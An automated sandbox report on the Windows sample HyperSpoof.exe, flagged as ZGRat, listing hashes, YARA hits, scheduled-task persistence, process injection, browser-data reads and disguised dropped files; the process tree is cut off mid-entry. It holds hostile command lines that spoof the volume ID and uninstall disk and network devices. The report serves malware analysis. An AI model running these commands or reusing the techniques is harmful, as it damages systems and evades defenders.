Analysis
max time kernel: 70s
max time network: 70s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 09-05-2024 01:19
Static task: static1
Behavioral task: behavioral1
  Sample: HyperSpoof.exe
  Resource: win7-20240508-en
Errors
General
Target: HyperSpoof.exe
Size: 172KB
MD5: ca27199cf4415233d9297b430dcf9924
SHA1: 8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4
SHA256: 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
SHA512: af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac
SSDEEP: 1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA
Malware Config
Signatures
Detect ZGRat V1 4 IoCs
Processes:
  resource  yara_rule
  behavioral1/files/0x0010000000016dde-93.dat  family_zgrat_v1
  behavioral1/files/0x0006000000019381-166.dat  family_zgrat_v1
  behavioral1/memory/2400-170-0x0000000000E50000-0x0000000001054000-memory.dmp  family_zgrat_v1
  behavioral1/memory/2208-255-0x00000000012B0000-0x00000000014B4000-memory.dmp  family_zgrat_v1
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description  pid  pid_target  Process  procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2744  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2876  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2528  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2640  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2788  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2548  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2780  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1680  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2756  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2752  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2516  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2552  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2600  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2948  1688  schtasks.exe  61
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2580  1688  schtasks.exe  61
Nirsoft 2 IoCs
Processes:
  resource  yara_rule
  behavioral1/files/0x0007000000004e76-89.dat  Nirsoft
  behavioral1/files/0x0008000000017495-133.dat  Nirsoft
Blocklisted process makes network request 3 IoCs
Processes:
  flow  pid   Process
  3     1932  powershell.exe
  5     1932  powershell.exe
  7     1932  powershell.exe
Processes:
  pid   Process
  1932  powershell.exe
  776   powershell.exe
  2416  powershell.exe
  1552  powershell.exe
  1208  powershell.exe
  2588  powershell.exe
  2352  powershell.exe
  2964  powershell.exe
Creates new service(s) 2 TTPs
Downloads MZ/PE file
Executes dropped EXE 64 IoCs
Processes:
  pid   Process
  1608  HpsrSpoof.exe
  2592  sphyperRuntimedhcpSvc.exe
  2220  conhostsft.exe
  2236  Volumeid64.exe
  1220  (empty)
  2212  .conhostsft.exe
  2368  DevManView.exe
  2956  DevManView.exe
  2268  DevManView.exe
  2276  DevManView.exe
  2892  DevManView.exe
  1684  DevManView.exe
  576   DevManView.exe
  2320  DevManView.exe
  276   DevManView.exe
  1820  DevManView.exe
  3028  DevManView.exe
  572   DevManView.exe
  2428  DevManView.exe
  2836  DevManView.exe
  2408  DevManView.exe
  2400  sphyperRuntimedhcpSvc.exe
  2028  AMIDEWINx64.exe
  2676  AMIDEWINx64.exe
  1656  AMIDEWINx64.exe
  548   AMIDEWINx64.exe
  536   AMIDEWINx64.exe
  1044  AMIDEWINx64.exe
  1696  AMIDEWINx64.exe
  1444  AMIDEWINx64.exe
  1816  AMIDEWINx64.exe
  1936  AMIDEWINx64.exe
  2772  AMIDEWINx64.exe
  2760  AMIDEWINx64.exe
  2636  AMIDEWINx64.exe
  2664  AMIDEWINx64.exe
  2740  AMIDEWINx64.exe
  1036  AMIDEWINx64.exe
  2828  AMIDEWINx64.exe
  704   AMIDEWINx64.exe
  3024  AMIDEWINx64.exe
  2252  AMIDEWINx64.exe
  2208  spoolsv.exe
  2220  AMIDEWINx64.exe
  2288  AMIDEWINx64.exe
  2492  AMIDEWINx64.exe
  796   AMIDEWINx64.exe
  2480  AMIDEWINx64.exe
  2428  AMIDEWINx64.exe
  1488  AMIDEWINx64.exe
  2064  AMIDEWINx64.exe
  1600  AMIDEWINx64.exe
  1544  AMIDEWINx64.exe
  476   (empty)
  3024  VC_redist.x64.exe
  2660  Volumeid64.exe
  1928  Volumeid64.exe
  1640  Volumeid64.exe
  2892  Volumeid64.exe
  2288  Volumeid64.exe
  2192  Volumeid64.exe
  1320  Volumeid64.exe
  1788  Volumeid64.exe
  556   Volumeid64.exe
Loads dropped DLL 9 IoCs
Processes:
  pid   Process
  1932  powershell.exe
  1652  cmd.exe
  2220  conhostsft.exe
  2220  conhostsft.exe
  1284  cmd.exe
  1116  cmd.exe
  1116  cmd.exe
  1588  cmd.exe
  476   (empty)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Enumerates connected drives 3 TTPs 30 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description  ioc  Process
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\F:  DevManView.exe
  File opened (read-only)  \??\D:  DevManView.exe
Maps connected drives based on registry 3 TTPs 30 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
  description  ioc  Process
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  DevManView.exe
Drops file in System32 directory 4 IoCs
Processes:
  description  ioc  Process
  File opened for modification  C:\Windows\system32\MRT.exe  .conhostsft.exe
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File opened for modification  C:\Windows\system32\MRT.exe  VC_redist.x64.exe
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description  pid  Process  procid_target
  PID 3024 set thread context of 604  3024  VC_redist.x64.exe  228
Drops file in Program Files directory 4 IoCs
Processes:
  description  ioc  Process
  File created  C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe  sphyperRuntimedhcpSvc.exe
  File created  C:\Program Files (x86)\Windows Photo Viewer\fr-FR\f3b6ecef712a24  sphyperRuntimedhcpSvc.exe
  File created  C:\Program Files\Windows Defender\fr-FR\lsass.exe  sphyperRuntimedhcpSvc.exe
  File created  C:\Program Files\Windows Defender\fr-FR\6203df4a6bafc7  sphyperRuntimedhcpSvc.exe
Drops file in Windows directory 3 IoCs
Processes:
  description  ioc  Process
  File opened for modification  C:\Windows\INF\setupapi.app.log  DevManView.exe
  File created  C:\Windows\wusa.lock  wusa.exe
  File created  C:\Windows\wusa.lock  wusa.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid   Process
  1772  sc.exe
  2964  sc.exe
  1864  sc.exe
  2084  sc.exe
  2564  sc.exe
  2520  sc.exe
  2392  sc.exe
  2672  sc.exe
  1332  sc.exe
  1796  sc.exe
  896   sc.exe
  1672  sc.exe
  2332  sc.exe
  2880  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 60 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description  ioc  Process
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  DevManView.exe
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   Process
  2744  schtasks.exe
  2876  schtasks.exe
  2528  schtasks.exe
  2948  schtasks.exe
  2788  schtasks.exe
  2780  schtasks.exe
  2516  schtasks.exe
  2600  schtasks.exe
  2640  schtasks.exe
  2548  schtasks.exe
  1680  schtasks.exe
  2752  schtasks.exe
  2756  schtasks.exe
  2552  schtasks.exe
  2580  schtasks.exe
Modifies data under HKEY_USERS 2 IoCs
Processes:
  description  ioc  Process
  Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a7fb12afa1da01  powershell.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid   Process
  1688  HyperSpoof.exe  (x4)
  1932  powershell.exe  (x7)
  2268  DevManView.exe
  2956  DevManView.exe
  2368  DevManView.exe
  1684  DevManView.exe
  2276  DevManView.exe
  2892  DevManView.exe
  576   DevManView.exe
  2320  DevManView.exe
  276   DevManView.exe
  1820  DevManView.exe
  3028  DevManView.exe
  572   DevManView.exe
  2428  DevManView.exe
  2836  DevManView.exe
  2408  DevManView.exe
  2400  sphyperRuntimedhcpSvc.exe  (x38)
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
  pid  Process
  476  (empty)  (x15)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description  pid  Process
  Token: SeDebugPrivilege  1688  HyperSpoof.exe
  Token: SeDebugPrivilege  1932  powershell.exe
  Token: SeBackupPrivilege  2368  DevManView.exe
  Token: SeRestorePrivilege  2368  DevManView.exe
  Token: SeBackupPrivilege  2956  DevManView.exe
  Token: SeRestorePrivilege  2956  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2956  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2368  DevManView.exe
  Token: SeBackupPrivilege  2268  DevManView.exe
  Token: SeRestorePrivilege  2268  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2268  DevManView.exe
  Token: SeImpersonatePrivilege  2268  DevManView.exe
  Token: SeImpersonatePrivilege  2956  DevManView.exe
  Token: SeBackupPrivilege  1684  DevManView.exe
  Token: SeRestorePrivilege  1684  DevManView.exe
  Token: SeTakeOwnershipPrivilege  1684  DevManView.exe
  Token: SeImpersonatePrivilege  1684  DevManView.exe
  Token: SeBackupPrivilege  2276  DevManView.exe
  Token: SeRestorePrivilege  2276  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2276  DevManView.exe
  Token: SeImpersonatePrivilege  2276  DevManView.exe
  Token: SeBackupPrivilege  2892  DevManView.exe
  Token: SeRestorePrivilege  2892  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2892  DevManView.exe
  Token: SeImpersonatePrivilege  2892  DevManView.exe
  Token: SeImpersonatePrivilege  2368  DevManView.exe
  Token: SeBackupPrivilege  576  DevManView.exe
  Token: SeRestorePrivilege  576  DevManView.exe
  Token: SeTakeOwnershipPrivilege  576  DevManView.exe
  Token: SeBackupPrivilege  2320  DevManView.exe
  Token: SeRestorePrivilege  2320  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2320  DevManView.exe
  Token: SeLoadDriverPrivilege  2368  DevManView.exe
  Token: SeBackupPrivilege  276  DevManView.exe
  Token: SeRestorePrivilege  276  DevManView.exe
  Token: SeTakeOwnershipPrivilege  276  DevManView.exe
  Token: SeBackupPrivilege  1820  DevManView.exe
  Token: SeRestorePrivilege  1820  DevManView.exe
  Token: SeTakeOwnershipPrivilege  1820  DevManView.exe
  Token: SeImpersonatePrivilege  576  DevManView.exe
  Token: SeImpersonatePrivilege  2320  DevManView.exe
  Token: SeBackupPrivilege  3028  DevManView.exe
  Token: SeRestorePrivilege  3028  DevManView.exe
  Token: SeTakeOwnershipPrivilege  3028  DevManView.exe
  Token: SeBackupPrivilege  572  DevManView.exe
  Token: SeImpersonatePrivilege  276  DevManView.exe
  Token: SeRestorePrivilege  572  DevManView.exe
  Token: SeTakeOwnershipPrivilege  572  DevManView.exe
  Token: SeImpersonatePrivilege  1820  DevManView.exe
  Token: SeLoadDriverPrivilege  276  DevManView.exe
  Token: SeImpersonatePrivilege  572  DevManView.exe
  Token: SeImpersonatePrivilege  3028  DevManView.exe
  Token: SeBackupPrivilege  2428  DevManView.exe
  Token: SeRestorePrivilege  2428  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2428  DevManView.exe
  Token: SeImpersonatePrivilege  2428  DevManView.exe
  Token: SeBackupPrivilege  2836  DevManView.exe
  Token: SeRestorePrivilege  2836  DevManView.exe
  Token: SeTakeOwnershipPrivilege  2836  DevManView.exe
  Token: SeImpersonatePrivilege  2836  DevManView.exe
  Token: SeLoadDriverPrivilege  2368  DevManView.exe
  Token: SeBackupPrivilege  2408  DevManView.exe
  Token: SeLoadDriverPrivilege  276  DevManView.exe
  Token: SeRestorePrivilege  2408  DevManView.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description  pid  Process  procid_target
  PID 1688 wrote to memory of 1932  1688  HyperSpoof.exe  28  (x3)
  PID 1932 wrote to memory of 1608  1932  powershell.exe  30  (x3)
  PID 1932 wrote to memory of 2592  1932  powershell.exe  32  (x4)
  PID 1932 wrote to memory of 2220  1932  powershell.exe  33  (x4)
  PID 1608 wrote to memory of 1652  1608  HpsrSpoof.exe  34  (x3)
  PID 1652 wrote to memory of 2236  1652  cmd.exe  36  (x3)
  PID 2592 wrote to memory of 584  2592  sphyperRuntimedhcpSvc.exe  37  (x4)
  PID 2220 wrote to memory of 2212  2220  conhostsft.exe  38  (x4)
  PID 1608 wrote to memory of 1284  1608  HpsrSpoof.exe  39  (x3)
  PID 1284 wrote to memory of 2368  1284  cmd.exe  41  (x3)
  PID 1284 wrote to memory of 2956  1284  cmd.exe  42  (x3)
  PID 1284 wrote to memory of 2268  1284  cmd.exe  43  (x3)
  PID 1284 wrote to memory of 2276  1284  cmd.exe  44  (x3)
  PID 1284 wrote to memory of 1684  1284  cmd.exe  45  (x3)
  PID 1284 wrote to memory of 2892  1284  cmd.exe  46  (x3)
  PID 1284 wrote to memory of 2320  1284  cmd.exe  47  (x3)
  PID 1284 wrote to memory of 576  1284  cmd.exe  48  (x3)
  PID 1284 wrote to memory of 572  1284  cmd.exe  49  (x3)
  PID 1284 wrote to memory of 3028  1284  cmd.exe  50  (x3)
  PID 1284 wrote to memory of 2836  1284  cmd.exe  51  (x3)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1688

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1932

    C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
      Command line: "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 1608

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1652

        C:\ProgramData\Microsoft\Windows\Volumeid64.exe
          Command line: C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
          - Executes dropped EXE
          PID: 2236

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1284

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2368

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2956

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2268

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2276

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
          - Executes dropped EXE
